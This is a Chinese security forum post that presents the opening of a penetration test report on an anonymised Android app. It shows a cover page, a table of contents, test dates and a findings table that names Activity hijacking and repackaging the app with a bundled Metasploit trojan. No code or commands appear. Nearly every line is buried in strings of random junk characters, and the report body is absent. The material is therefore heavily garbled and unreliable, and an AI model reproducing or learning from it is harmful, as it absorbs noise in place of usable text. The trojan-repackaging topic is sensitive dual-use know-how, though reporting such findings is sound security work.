找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4391|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1 f6 @1 N7 r" I+ \$ V ! b$ J" V. S4 N, s) b' _4 h# L

! f9 h9 g: l1 ?# }$ ~" _ 0 ]" |' ^: S! {! `1 P7 O
) M6 E4 A% b( n7 C + D0 m- X8 m8 F5 C" P) I( L

7 ~0 r7 z4 R. P# |2 u/ k $ Q2 X1 M" {0 @2 q0 h
/ a; k9 w$ _# E2 m# A7 k9 S 7 i9 d% P8 i2 b# B6 S. c

' W+ |% C2 S0 S* Z% E. ^' C% B8 r 8 ~+ y" u1 r. ?4 j$ o 文档编号:                2 W# k; N* h# v% i; r0 | 9 i1 E: a+ I8 X* M0 }- @. c! ~

' T6 L3 h) p: W, w5 {4 O, D 4 w4 C- b7 r' P) h3 j

' n9 ^; q" N% u: l! R6 Y 1 x- ]) R- G8 A, Q: f0 K* s   2 I- q/ \( \) G& h% Y- |5 M/ ~ $ X4 Y |. U7 o$ g7 ? Z. A O5 d( s8 {

& D. z' M0 b( M & o: C" {3 w" b9 w, @$ [' o: |

2 X% m& V' ~4 o' [* T9 z 2 y0 S! E& ]$ [3 Q" ~   0 B) v% ^4 v3 ]6 y* a2 U& n . d: n [4 E# ~. y k& F! U+ f

* T) f) C! E* o1 F) H1 h" P- S# {5 E; j

% M, d/ O: H! J( k1 x1 c- c7 P 6 ]4 Q2 g D6 @' p! \8 |3 `   ! S; _$ X3 ?9 R4 u5 S: s- b9 J Y) n) Y! f. b) E& x% }8 x

# e; X2 \2 l# A* Q, N N 2 g4 _5 E$ {# Y* k% e M5 L( n3 C

# K2 m6 x( }6 j# h$ \. M# | 6 l: d5 S, |, L# J0 J i/ U6 x   4 ^% m7 X' ~7 Q2 B3 c4 Y# w6 U " [ z3 A% t% c8 m$ D

. }, S9 E) E8 v' Q! ?$ x- I- _+ ]1 S$ J

2 z: |: E* q1 ?2 P4 q- Z' P3 ?# s - k, P! o5 f, R" w   5 x) U8 }6 h. o1 r/ ?* ?3 Q7 G $ m9 O& v1 J) C

0 i+ X$ X. S6 b 7 t$ W+ p4 G* W* r: M

; s' F m" ?' A) b 7 S, n5 r; R" f z A1 b- x- @% @1 v 某某某APP渗透测试 7 B: N) \7 a, D; i5 Y( V, R $ W& Z3 X' ~# u. x

8 s1 ^. {; K+ v5 P6 |' ]8 L* M8 `$ `" Y, b0 u

7 }, s, Z. t* h4 L/ T + T" T$ `* ~' G5 H' ?   ) N( H1 ]# x1 `, c N8 C 8 D" \ i9 ]8 A

9 K8 B% ]4 k; N2 Z0 O % S+ t/ ?; S- g$ F4 W) q

: u# q9 q0 ]6 E+ y$ o . j. E' ?, | T0 b) ]   , [" N( Z+ v5 I [0 g ; j g6 F N Q5 H1 k) {

* ]2 t1 E$ `3 `8 X' n: z0 q * Z: D" N$ l8 N7 I% {6 m J7 f( P M0 W

) G5 D: _. `# e/ U. @9 S7 l 9 D6 [+ |6 ?9 i   $ P* M9 S1 f% {6 @# s6 Z 7 |1 j D7 b# ]9 P2 y

, O; }; J* x# o! y) X; b( x0 n5 E1 q( I5 p8 A! X0 s3 V

! c& b: Q3 Q# \3 y0 { , z1 {8 g9 U. u   8 E b: X$ h0 g( Y- m ' e3 {. \8 u1 \ n, p9 y- C

6 p g- n$ Q7 y& ^" g8 Z, l 4 f, {! |4 h3 E l

7 j4 Z" N& \ Q+ v % ~8 Y% {) M# a/ B) D% |2 R. J! g 技 术 报 告 ! Y3 @; V* H2 E1 B/ ?: i; Z0 Y" W / \9 l% F5 ^ B+ a2 h! K

8 G$ I- w- M& E h3 B# S; Z 3 @* e1 g- W9 w& \

R# S. O. V9 f I8 H9 o1 P# ?( Y& f7 s' S   6 l# ^% i7 B. R- f- ?+ L3 U+ ` g" V n5 F! G/ [( \

+ I: c4 y2 E I/ p }+ j 1 w, B( d5 H8 }. |3 f3 [8 i$ \* ^

$ I) i1 F- X/ V a% P ~* g : B0 N/ n3 H+ I+ f   : E0 h7 M! A8 S( K+ J/ Y& x& m1 e ' e8 z1 I" w. }7 |/ D

0 m3 Z8 C- M% f * y% ] ]$ V- e; I( q$ R2 W

3 c" Z4 b5 v4 S* t 6 U! q/ [ } O2 K i# G7 E' e   $ R, Y- f9 D6 M& a ; p- h, ?; V {; D

7 H* l. Z0 o8 X7 N / U% _/ j, c( R" ]; ^1 q% q% [

7 E7 a! X3 x ?& e+ F 6 n6 a$ Y1 h% o$ o8 Y0 f7 F3 j   0 `* E% |: ~3 ?/ S; P v8 W8 `$ k . t( Q8 _/ _6 {

& U1 X. i) P* S9 ~# J4 e, e& {0 u 1 t' I' w6 [) N! ~3 X* T6 s

. F. u2 [! h! ^ : M$ _3 _& s* \+ S   1 J$ x/ L5 Y# B5 V$ o , H7 g6 ~' h& p" P& w$ P

0 Z% s' S, `& k; L " L# T. W7 d1 t& Q- Y, J

& Q2 {' F) |' j6 R& \' Q' X- ? " W, D7 @; G# t( ]0 B   - I- i. v' c3 @* ~2 U# [" O2 f. }9 R2 p$ X* c: C6 v* ^

( }! y$ a; k: m6 E3 u / u3 H ?- l& |' c$ a$ A

. W: T; ~$ {9 _ n# p6 W; M% ]. y # S3 G# g% A0 O0 N2 \) T2 R C   $ Z- J! g- Q- \) t 7 r8 ~$ V' H8 K' P; H4 W2 R) _0 {

& v( X, V+ `* z7 m" F) v/ X4 c : Q5 v f5 w- q2 h

+ X5 v3 T' N% f. L3 V3 c* G" _! _& u% o& [/ A$ i   9 [2 O9 G: D- P5 ?5 _ [. H1 X, o) x 0 F( S' i: _4 P6 f

; L& O4 U8 a" x2 g+ `2 i8 a" A8 k5 L7 R& t" h/ i& [

3 Q. W+ V$ o& F( p4 q* ? ) S, P, Y5 Z! ~8 `! Z2 F1 l   * J7 C/ m" b/ D# A; X, x( J9 q . E+ U% b; M( k+ X$ y' Y: E2 M

& R* k5 l$ R* @1 _/ g( ^8 K% s & E2 a% ]" R- g

' J9 O5 Y# @4 q; ?2 Y , j# H3 J4 r5 w% B) N6 Z& v7 [/ l% w8 D   3 g1 g4 }4 g2 f2 u* \ % z) B# }6 f' a2 t" @' c& C, G

! W0 Q0 R, {0 V/ d* g6 j. p4 } 7 j7 T2 l0 ]/ j

. f+ w2 i+ i+ h ( S" \$ J: Y1 {% J/ G z! J4 r2 `   0 `- r3 m: f8 d. }. Z ; k8 {( O9 k0 w+ Q

+ I: |! ^# D7 G9 T ' O3 k& J7 p- }# [# P/ p# |* o. Q

, p6 K; Q6 w- q8 y1 y& g. ?2 v 0 Z& I; M- \) \/ ?& v/ e+ H/ e3 g   % }0 G, D; f8 ]. P" B 5 t7 F* y$ ~; S' G

' [7 Y' d# D }. m+ f7 \6 Q 1 u3 b3 @2 Q: v

" h8 K6 a8 ^2 \% g, {9 J6 I , K; }5 ^. S3 R7 a! r+ \   0 z3 t& O2 u( {8 M- ? + y* s+ m! O7 L! g, O" Z

+ _" f, n9 q0 n - C7 e/ R$ X# G& e9 K. z+ d* M

i5 e$ S3 X0 G. k+ R0 d3 |4 x 9 G8 u/ U6 d5 |   N+ s( L- Z' @; T5 L# u% |3 v8 H- Z, V; S2 a9 C' y

0 g3 k/ |" Q' d2 ~8 a 1 K% F6 |/ a* u7 V+ H2 `" @

4 A u$ ]) ?" U; y" P6 \ 0 \, W* o& ^% w& u# y) H0 z/ R   ! G' _# T3 s6 i& m 8 h" {$ X7 K" T6 b6 {- a! ^/ h7 z ^

O! o, K% }/ A" Q/ I) M- F) E; L9 B0 i+ S* Z/ T

7 ]% z/ s$ h# F7 N! e) p. z/ K2 O* D7 F' Z) _   : y3 f. f. r' e/ H }% Q. { ) H L, G. y/ b; c m

7 x" p1 o9 C7 G+ U $ @ @0 L8 u z- R" |1 c

* Q* P. {/ l4 ?$ t$ ~2 v6 r/ i0 W' W3 j1 b   7 X# K1 B) {1 m% x( h' a- k; N ! h8 F! P W+ c# ]

, Q8 z2 a# F$ C( ]6 J& X! J# @# V8 A 4 L/ a% x/ V. H# N. |6 j: b3 |

4 m1 }" T3 b4 J4 w . }; y* B, n! Y' F1 g; S   8 `6 G, \ z R! W8 z2 a 8 C) u, |6 s9 ]2 L7 R3 n1 }

6 Y5 y, W$ k6 Y' J+ J: R& v" k% E: [ 4 p$ d- ~: w& }3 M3 D% @& V

8 k7 x* v9 b, @2 q5 N2 r8 \) \8 U, K/ l 二〇二〇年 $ k: D& n6 u! D+ z8 v" q + l4 H! K+ Q# b9 ~% i K' J

! N- W# _& [+ v0 a! V3 \ 3 z. _; ~" d0 e# ?: V# |- W
" {) J/ u9 R( T" L + ^- ^8 D8 G, T& V+ j
! ^8 ~3 i7 Y O$ ^, R% } 8 v: M1 o, W. [5 X, r# i- ^9 M7 U6 z
; E0 j: d3 @ h3 `" x / H; a W, |% S1 Y* ?
( {4 I* k1 q! |& N: } A+ g 0 w% H% Q9 d; D* E9 U+ S4 W
8 @: m- [1 i6 I$ k0 Q0 U% u! R6 @
/ ?7 B7 f( H6 u# C* N" M! X " t8 _& H6 F( A9 b; U$ `0 Z
1 R& q. v4 q& o8 t5 D7 q7 N# ` 6 r4 f. G4 p: y1 Y9 S z; P
7 [9 @! [ c3 k' o, D3 ?, i ! ~; P5 Q9 w* s3 y! l( j6 G

, Z5 h* x/ _* t9 y8 Y # r/ t% H Q3 {8 f' A* j 目 录 1 c" R" a' d/ f2 G( X0 m. ?* h, u2 r

' R2 o) h. x$ L: ?$ ?+ x / k, W7 o Z8 O% S0 | 6 l- _) m* H& b, Q, ?. E/ c2 o0 W# y& f1 K2 T) U& S

' g6 r5 u7 i4 I- r/ O, b$ d5 n5 @" U( L 7 _; J5 v8 F9 p! V4 c* [, g   9 d2 k1 B6 g ~& o1 V9 Z* ^ v - m1 p4 N" P: l) n: z3 V: W

' w' \ }- N+ k2 u+ _- I: E & t: l$ r6 n2 D6 o

3 D. c# I2 [$ o a" C% u - J. \3 l! S& f 1 概述... 3 4 l \& d: }8 I8 F ( Y8 E; P/ H3 N

# h7 }( ?& J/ k& w* c: a& S) ^, \( J0 G: P4 K, H! Q, V0 k

6 G# Z; B! |4 J+ `* K5 ^- q( C! O0 P ! ]+ y1 S: H* w2 k 1.2测试时间... 3 ( y5 T& g, @( { I# O( z # J( h; m9 X* I6 D4 s1 j9 |6 c3 K

J6 G9 V5 S; T/ q5 U* s$ w; ?9 n! W/ _* @( U2 n8 D: Y

4 x/ i) i" w- A) Y* J$ u 9 I! Y. ^; N% R9 q) H/ V) |" n1 {% x 1.3测试对象... 3 ' P8 Y: E0 x1 w1 F2 o" X9 g r% r 2 i+ _5 }3 J* F5 z

( t: H" V9 K) g6 {+ \9 u) D 2 k' B2 y: g' s9 B

L W) L) l% K, \0 b9 M( P! n9 b) x; w2 | 1.4测试结果... 3 8 v9 d/ E3 S/ d2 O6 H5 o7 a9 k " t% K* T% j* i& {6 I4 { g: c

% W$ o) K+ Q& @3 p+ p* [ * ^& R8 j- {" q+ ~. y+ P* |6 B

% N4 p/ i, x/ b8 _; h- R ) e+ o1 g' m4 G: y5 n% W1 I4 U9 h 2 检测结果... 4 ; t6 O6 Q/ n$ k$ R0 {5 } 4 a2 J% Z2 t' A. Y3 W$ e

& Q9 B0 m% L: n( `6 P2 L ~& n$ A : b. r9 N( g+ {6 r! O' ?

9 S* n0 F* B( l- i+ d, w$ M9 d, t0 T# j 2.1 某某某... 4 8 c* x* e" [& |5 D+ ^ : g$ O* U) M0 x

4 F5 M7 k, l* d4 U' v% n' \ l" t# H5 y' Y+ u- E

/ X% [2 m/ x( g3 W 4 g9 K% B& c0 l 2.1.1检测目标... 4 ; T }0 @1 r8 x) {5 \" u ! i6 ?5 R5 Z. |: d* v( c; f

" |# s: L4 E6 F: q* h% g! u* e/ r" s8 I6 H+ I- {: s$ K

) K; h) L' ]6 D0 C2 e- X- u- S" o* {6 Q 2.1.2检测结果... 4 ; _( N/ c/ x% y' K; v) c- p4 l 8 M4 ~6 w3 B/ M# u. N# ^! t

5 v, V6 C |: \' B- Z% u7 d8 T7 y5 T# B" ~

" F+ {9 g5 ] a- F3 P f- U' v ( i8 b) w) o! j) J 2.1.2.1. 4 & S( M% l% Y$ r8 h$ W" ? ) M- j! p: x6 t7 ?1 O0 W; N. T

. G- _8 T4 M+ g- ?, \* z7 T. o# g+ e6 f7 n6 H8 C

- q* n, k( {9 Q5 @, N ) F6 b6 A3 }. n& T& o" b 2.1.2.2. 6 ; z7 S" ~* r2 N. X4 i% u3 w 3 s. r9 I" ?5 `

* m0 q" O. I) Q7 |/ {/ |5 S# r0 w7 s7 J6 c1 I6 l$ M4 l& r! i+ }3 q

# a* W) Y, d9 I4 J$ y& N 4 N5 z M, M6 H, b + Y0 E5 D7 o/ z' S" E, s. C/ d % P* q" A& p2 ~% [

3 a6 M5 n' s2 E, R: q4 J6 X O, O* y# O0 }. ?
, C( C* K" o% S0 S, M+ |+ r: m- E! N # i6 n* p3 X! z3 R# P; ?
$ }6 C0 N7 ?% j) {, p' K / `7 ?; J7 W4 s4 `3 E* W$ \# {, E
" [/ C2 N& u, L- C' L% z7 X& ^! O( ^% w7 s; \9 m% }& J
( E+ D: {6 A2 ~+ K% ? ? 6 u: Q8 x: i3 D' @- n8 l% ?

7 e# o% d( V( s/ h 8 F7 q# | e, V. i 1 概述 & y9 c4 C T. p2 c * O; n+ D: g: }" Q% s/ l$ S( x9 b- n

- J- ?" f3 e; F5 w) b) |' P" u* S% T. |: q

0 X& ~% L J- {$ x& o 9 O/ X+ Q( S' Y" H2 p# j 1.2测试时间 v. i4 O" ~3 m7 S- P% b8 l / R5 h, v; m# m! x9 h$ C2 x9 w3 C

/ g- x. @' R B X8 ?% E . e, \, S2 V- b/ \1 R 8 X* G$ L) z- p6 g/ G/ z/ L; u+ H9 L6 M, P4 F* N6 R+ f4 f! R* N7 l2 l5 u; _- o9 d; m r9 z$ m9 y+ x L5 ]5 D/ z/ p& K i- M# J( K: t: @6 S, b! F: @4 y* A6 Y4 ^# {# t" h. ]6 l- E3 s5 `! A9 K* a @& ?/ o8 E0 |$ [8 e7 [1 S' G* i1 Z* c" Z! I7 {! ~7 j5 @' F2 u/ ?( F6 h/ ]% }* D' z, `' p7 Z$ m: V0 h: J; E0 G$ w: p0 T" v9 L( s8 c: L4 s$ x6 _) ~1 S/ s6 Z0 C: Y, ~5 t" W0 D: M# q5 e0 r! a! S# ~0 o; |1 W& F+ ]& {* S3 J* c1 x2 T' l8 D5 F7 }2 g* p# m) `' `+ l7 `- P0 h: n7 K: B7 _ u, A- B$ A+ e" T, t- n5 x0 h: w+ H6 A( v3 k( e7 C7 C$ v% E7 Y9 c4 i6 i u, k" o( _' D/ W& x; S+ W M. `& c# F+ g/ d) {/ q/ [" O: p |# q, e# H4 s* }7 m* g" F1 x0 _% Z
7 c4 w% T0 u, r2 t# P- T$ {4 k : B# Q1 {+ r& c0 {; V

9 a4 m, w# d. s+ v9 z+ A" c* _8 O! Q$ E& v& G1 q. i' u# m 渗透测试时间 ; P3 a; o5 c! |% B3 f ) D. Y: _9 N( M0 y: l# E5 Z

/ P \/ i, H" X9 A0 n 1 E; z8 H% b8 Z4 C
5 T/ r; Q8 U" e. v# @9 k& b7 }" M, J& m* u' o' @

7 t, n$ x3 j4 E- Q3 R 2 H) L6 e: W! L8 k 起始时间 ( E) L% d$ f5 E" I% ]# c; W, r # ~ ?# |1 f7 A

0 |$ l% C) _3 U. k 4 C) h3 c" t1 E2 T5 G$ a
) q" l7 H5 B/ P9 v8 V: q9 T8 _: s2 O + F( m9 A0 W+ x

' l+ O( T7 o. X# @) [/ _8 \) s1 X * d0 w1 o5 S/ @6 | 202046 . ?4 f% Y. B( z* Y0 N # M W5 |& E( }6 U; d* `

4 _% G' G5 ?" h8 [. h+ e9 Y2 j 3 ~7 V [8 c# V: {
- f3 g3 e9 s' ~; P$ V; N! {. m/ E3 Z2 i* a- X, B% u! J

5 S7 @1 o ?* O$ d: ~ ] 7 V1 k7 K/ o l 结束时间 & y/ X0 |1 c+ e7 u' g2 { 2 z% k8 r: J& a8 I/ K% ~+ F

M" Q$ P4 A. L. m- u% O2 A 2 O/ b; B# I) y, s- q
2 b/ X4 @* C0 e l0 p( H; e - ~& ]: B+ e4 r2 F0 a5 {! l

3 @$ {9 e& H* M1 t" }; I . b4 }- e* t' h 202049 6 L, Y; x- _0 L+ ?7 p- |- ? / z0 c7 [' z- u

4 a: i* ]9 W7 h, u' T, A ) j- q. O* w* J& N% K
, ]; p2 I9 r/ @7 c- v* {$ J+ b) z T% `" k7 n9 C/ z1 q# }

$ }" p Z# l Z" Y7 l" K 1 ^) Z3 u$ o, f 1.3测试对象 / S3 e4 [! X, ~& v5 W, O0 Q + g2 u% A& H0 T( e

4 g U3 X$ c- A' M3 K* b( `! I" f' l J

7 k3 ]. E v; D, O9 z % r% {& s. I7 @4 r2 P2 | 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 9 F4 m: X; t( e 9 ]- y* s8 P# `7 y% o- B' j1 Q; }

& {& ]* m! T' ]7 a+ h' q ]" h1 O' K2 k( M( x1 A

! F, ~1 K# l$ I : [# E+ l5 ?5 ] 1-1 检测对象 0 h( @9 K( m( b8 x0 U2 y; S, O4 C; E" G

2 M+ p* r. }0 O% ]8 N $ {( U6 ~. Q/ k: X 7 r5 l' e P- o0 k$ S( q( h8 k3 y8 }$ }4 k U% L2 G& A; j& g4 q7 s) e4 U& r6 f' g$ G( e; [0 ^3 t2 P S2 X0 C$ k3 F# X/ c) K1 _* A3 [2 c( @( I8 k( ~% h( t6 P+ E3 r2 s) u$ W9 ^+ x3 S. _2 p4 t; c y& {/ n0 c- S( z# ?0 I1 C' i1 b7 ]" `8 w7 P% i+ Y- U* `" v& O4 Y5 u+ k5 m5 O1 @+ \- P7 F& Y# p2 W9 {; K6 w6 X3 h0 O" q" N4 v" |4 J6 w: X$ R8 Z3 J! L/ \# j& f* M1 Q# j% j2 q4 D" e& W6 @0 v6 r: l/ m' n" d- {. p: q+ Z6 x: [ {* Q) k( k$ X l# n# r7 O' E# w' J: {0 m! w6 v' } |7 ]# Q. {9 ]) U D0 c/ Y! ~: R8 H5 M" q7 g- t. a/ E7 ?: }, Z7 {% `( \2 q9 d. |( S7 n. H% K6 w1 C* K$ q. I* i7 h" B9 T; }6 G+ Z K+ u* ^& ~. U1 r# C% O. U. U$ [* ^: _: Q7 o( [2 b1 {/ n5 `' }2 [& E: n6 _- B4 X" M+ u" G/ J0 f# X( G: l, k. v
+ e1 p1 I* d6 ~0 f5 L* _. R4 y1 C. t

1 k6 x- c- t9 X* C1 V3 f! Z( i# y* R }/ E, |: Z/ Z7 ~ 序号 4 a7 p- U( Z8 {, G $ Z3 N+ G6 |# B4 M' F! l5 z: C

4 i, D1 h: ~/ Q/ | N8 M0 F+ u" Y# B! l# t% ]
! c% y" [6 {0 K8 A 2 U" y+ _# I* t: D# {' M2 N

/ [$ L; i* T, }0 H0 ` + k6 ~: c) F* X5 M7 r) d 测试对象 ) V) q2 t1 j' S1 Z( ] ! Y- I B4 H- {+ {% J* d, j+ b

9 X1 Q" r5 n& M `! X/ l7 a9 O' M; M+ M, c6 z0 w, P" c0 o
" X& s& P$ v1 ?0 v2 p2 C. a6 t0 M' N G9 s, l& P$ D5 @

8 m8 A# S- D$ Q. n" n7 K - Y8 C+ u5 t J g# o( | 测试地址 " F) i [* C! k& p # I+ f% y/ p0 z5 E' W

" b2 S7 J4 o; E. x v, o) L- w
. P) v. A1 K0 }1 M) E3 Y O ! K9 ]2 w- P: C% A! l

& p; m; M/ n) ?% f0 T$ X " r3 ^! ^) I) L1 \- s) _4 F0 p 安全漏洞 , b; F8 w1 F0 G9 H* o* q/ |- V F+ b $ ]# K7 _( q$ ^! G+ H& @

% ?0 X$ {; ?3 V! C* A6 j / G1 }4 S2 s; Z6 `
( ^0 ?6 \& w+ C; d$ E ; m2 a3 K+ \+ }2 j

9 a' f- G4 e/ G# E; h 6 j- @9 P5 e' p' Y: e J. h/ o; r 1 ' h. B5 t8 p& m! ]8 g' { 3 e6 d$ M' I; Q( ?) O; T

" l! K E: C; e9 r Q0 W+ L 0 b8 v7 N" L& A( W
$ M+ W R5 }( d [% `) M6 K A+ c/ C ( y. M) G- u' u$ E a% y1 @

* m$ C8 f$ y) S 5 [8 p$ }* O! R" O5 Q* F- A2 Z& a 某某某安卓APP # Y" U) w/ f' u& i; M 3 C2 P/ ?1 n- S. x

9 b+ s$ E4 w& v' V- I% R- ^0 P 2 a) E* W9 d1 X
% z9 M' c1 a5 w % V9 ? a- [, k- q6 `. J

7 A L u5 j. S0 L # e# W# `- u8 v- g y   - s3 S) _6 z9 I8 o ] ' @) k/ \$ Q8 b4 W

2 R# y; ^! }7 c! Z" d9 s / z$ g6 k9 c S4 N" z- O1 \0 [- \
+ J2 d& H% ~# h: V& u3 C( a$ D6 N7 R- c# }0 R" e8 I

. ^" k% v: D; N# y+ T% G 7 O) w: \3 s& ^ 2 + C) k& n9 A. q1 r2 z- D& s * W' N9 e& S& `4 Y

* ?0 l$ Z( L7 d- ]' w 8 d& a& E: Q- P' a! j
8 T7 T8 U2 }, L9 s. M7 w% D ' C/ m5 _( b6 i/ p# G

" y9 A2 R$ x6 F# R" d6 Y+ `" |. Q- R6 U! ~, P 1.4测试结果 + c* Z& q& S) @ n( t, p5 X ' ]: g7 Q0 L! n! d

, L0 i- P8 R8 A" w: s) V4 p2 t Y" K- V9 T1 x8 B% _+ h; S

% D. \8 U7 K# V$ _+ k* K/ h- Z; n$ _$ B7 y" ^ 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: & d. w# ^+ Y. ^9 H" j5 d % D4 r F% e$ L6 `

1 x$ V+ a3 r8 Q$ q5 ~/ h( z ( d' Y4 y0 ?$ [- ~. C" R" o( p( ?! X

7 y7 O+ j8 e% }9 B s+ R' j0 p/ j7 y; K   + H- J5 |. }3 l, u6 z6 {3 W 0 H Z. F3 v8 j

9 D$ n& S$ e Z/ u/ G; ~% ?$ h; Q3 W; E6 s7 S4 P1 u+ w
/ }, ], f1 W/ A7 U1 Y9 s" |2 Q # C$ F- g g) H* X w$ r. n , f1 P# F8 u1 z2 ^. a0 E, m' e! N6 B" a$ [; m+ r/ D0 c b: C* m) S, x. _% N4 ^; n1 b2 `2 H$ m8 o# `. L: F8 o' Q0 g) }7 b% G# n4 D# Y" s6 l) T+ L( S% ^0 i a3 F9 i" Q- w, Q. x! P6 l! @0 O- o' H* M4 V2 a8 ~" V; p5 l2 k% U) O1 _0 M1 ?! x/ f; i( P" g5 n4 k& O" Z, } G" p1 j7 X4 U! r7 J* K: C5 Y5 D, r, [4 r j) v3 ~8 S' U) L( D& M9 A1 m) @4 E' z. S8 g3 j0 k6 n0 b. P, `3 x! Y* U7 R4 }% r# I2 g6 `0 B# D; I( \. F7 k- S9 j- E) a3 F# d Q( ?, V6 f8 k( H3 `: L; K4 H0 l4 a% R/ M$ e/ L- E0 x& s8 \8 i- i8 H5 {- g. Q+ Y- R+ I# Z6 s8 j$ {# P% ?! n% @1 Q/ n, D5 b w" a5 G5 W- @; b, u$ T6 O5 f# M- B* B1 `/ ]: h4 E4 r& B7 m/ b: C2 s* F/ z9 G( Q, V, a4 y g! D, }9 k- K8 Q# G' [/ Q7 u4 o4 j* P$ C& X; b. J- I2 k7 T' A5 j9 W9 ] X3 g) s9 N" y- R6 k+ Q. A; ]1 J7 w% B6 w$ G, g- \4 ~ h# a2 L& F$ J5 U- G; q0 X# E+ W% ^. v& G: W* @9 k0 f/ X8 e* k; Z6 F, T( l7 t9 m1 i t' U- B. r8 N+ t" S6 h/ D# }1 A/ a4 b# p4 r, v- E( N y" C5 w5 Q8 s5 H4 X3 [6 K; F( u3 S6 I n) k! w5 k" \7 S$ o7 E# ?# Y+ g& N7 R* a0 |% o0 G5 ^1 a) Z' {5 J2 r; F6 r* `* @! ]4 ]! z x/ X% y* T. J, b! k. Q" y$ p' A' c' N" n$ J+ A7 e0 A4 Q5 s3 F: K2 G2 t' d; ?: y O: a' r6 Y- q& E ]' d7 R/ n0 Q) _& v1 q/ o" O$ S: R$ y) Z
) ^& v! f, L8 W! L1 S b! w; d

" c/ i0 N" j* Y# V' F$ g" Q5 R, P7 Y. s2 ] 序号 % \ M: @& c0 V7 f/ c% i 4 @( I6 F4 t: A0 c: T$ X) P

- |. [ `# {, E) v! _5 t 4 z* B% x2 e7 G; W
& [; G" ]8 M3 r3 c8 d% j7 M {3 O$ H, e- R, s% M

9 f. F) I4 K9 E & X2 D( i& ?8 g% s& G. B; {; V+ c 系统名称 % a8 t: g6 Y+ F- N/ I ( d2 W! j" J: |; {8 O

0 b. v8 I9 r. J3 W& ~ * F* ]# E# _5 H; ?! Z
; W( r: J3 C9 U" @- Z+ a 4 A/ L5 ?8 B; ^5 \9 L( N

( \" {2 ?. b/ u/ ]5 o$ y' \9 U% n6 W9 Y$ a7 c% _' Q 漏洞名称 ' u5 m w+ T5 G# I, e & p( a+ i3 S5 _! m% }

' Q C" {& ^5 |3 T. \- l ) E9 o$ _# U/ H7 i. {& |
( v2 w# F4 l1 ^( }5 S & @$ m; L% ^2 r6 J1 T

9 D3 N+ c% I- T4 ^! O# L2 O * m+ N! {" i' u. B1 Y 漏洞危害 ( k( ^7 @0 H3 C X! J6 `/ j* S, J 7 B: d6 O9 Y# \- {9 ^

/ `. e$ V. Z6 f# V9 I, | 9 W6 Y+ j! \, {7 i3 y( v; g" z
* c2 D" e7 a( P 7 r5 z4 M$ y6 |2 C/ @; w7 R

; x, \3 I7 `4 L0 F 8 J8 Q# m( L6 {% U' x 修复结果 ) s5 @' `& S# B2 J, a 1 @9 M( d- m; L# O5 G' v! R- \ H

" o, c* H( S' u9 w; c 0 Q; E C! W9 y9 Z
3 X1 k5 V3 I, M& L0 \ . G ^% h$ v) J% [

L2 J' k L4 d/ B* [4 H" X, b* d% j' L 1 # [9 u7 K4 s" ~' A; ]9 g9 Q! R: C0 X5 E) h

# ~1 f$ z6 f8 T- I* \ 2 L, D8 }( P+ p( v2 z/ c+ q' P
6 S9 @; D! s) H, M2 m& p: [$ I: Y0 p" G; H

6 {/ _, S" [ L4 B( E. L3 @ * l( s9 y' D+ q. Q; E6 o0 } 某某某某某某APP $ t- K1 J4 q- r/ P9 _! W $ j+ U _ \0 f9 a* }/ L

2 I: z5 v+ d) N% J + _! \5 z3 S1 [
" V, A. I0 W+ y# i& G: T# [* N! E7 |, i& r" ^6 [

2 N* B7 F; L# i0 M3 b# e3 E/ R) b( K O& }' h- [4 Z( Z Activity 劫持 ; `5 H& E0 W8 Y0 X! p1 b+ t1 V3 u7 r

! m+ r$ d# g0 ~ ; @# n c8 T' f3 D

+ T" H+ ?2 O1 ~' k ) v! r, M! I$ ]' i   ) {- {. x8 j: T& `: w7 v1 ^1 U& E$ j6 B3 c; U3 b

0 \! I4 G5 {/ k! Z4 Q" s3 D4 Z$ ^5 H) r
# ~8 B, d5 F! k J 7 Z( o" ~3 i+ M' l. R

+ z& d8 Y; O3 h, ^" J ! w4 q7 C% W/ B% C& } & z% G) P+ Z2 \4 R% ]* |6 x - H9 u( M, |$ j' U. E: B6 F

' q) n9 C1 c% Z5 X; ]* b% M# ^0 m ) \9 x1 f1 \+ L( z
# ]: n& A7 |" s3 D5 y1 }) C o$ W. H1 I! X

+ B5 k# u/ z3 r; X$ v0 u2 D; W+ P, `* u' A   ) z+ l0 q) U/ H8 L! ?- l0 ]2 D 6 L1 E4 N/ v M2 E9 p# n* ~# `

9 ~( G% F- {- C; |# `4 Q) Z * G, j" G" i# ~& f
+ n* d8 K. t7 z" x ^) S+ l : W- q5 y! B& K6 p

7 W9 H7 G+ D" O$ ?+ K) T7 U, P1 @( L/ C - V j7 @- y5 E: }/ p" d 2 & G+ I0 r ^/ z. z) n 1 P5 ^( u0 O' I3 q8 l, R

& l5 u {( m/ `6 w9 c, {" k+ w, z: |- L/ i
4 t' G* L( J5 d" P + m, z; { I" m: x1 v) i( {/ i( r8 A

0 _* g( S/ ?7 `8 w/ }$ \; y5 t9 @7 } v) C) y8 K! f 某某某某某某APP ( u( H" R w7 V* ?; l* N ' N4 [2 f' S+ Z; I0 n+ \

% {9 E8 a1 A( ~1 z- i0 t 2 L5 L. [) g: I; z, T
/ K# z5 e' T |( N: _5 U6 J) P2 o6 K1 w& Z: B8 ~

5 N) s" t, A4 a0 @; | % @# O6 R% E1 x, y$ W 反编译二次打包捆绑木马、篡改APP代码 / e7 r: c. U9 G6 H4 J( _ k, J9 p$ l P! e! B7 k

, i- {# R9 F& O% `# ] 6 z0 ~# T( o) X4 L8 e) v5 v
h% j+ @9 e4 g3 q* a' K6 T 5 V+ K* y& v/ w& W; r

6 v, X* U6 g. v8 `4 F6 n 0 S# q" H& x" G- ] I9 h6 `& G; J 7 t& o9 l7 A% ]4 v; ^. [1 q8 J - }1 v9 `6 x w

: H5 T# s0 _& w% W' e. S6 [ / x0 A( v: l/ p8 e; }2 \; v
0 j. Y' M% B1 K9 B 2 H* v8 S3 O2 a! e

3 P8 U) A) O" `# w 6 I! _# V' O1 }! k( N   7 i4 l3 C1 h" u' ?. [! r3 |: U. S9 G+ p

& ] C7 W, A& K( D' M 9 M7 ~9 a; v O
+ b! r' Q# @3 D! k $ q4 Y6 O1 u) u
0 D$ K5 f8 i+ ~/ y+ C/ ^2 A. J: C$ T- V8 Q8 ?8 V) X6 ?

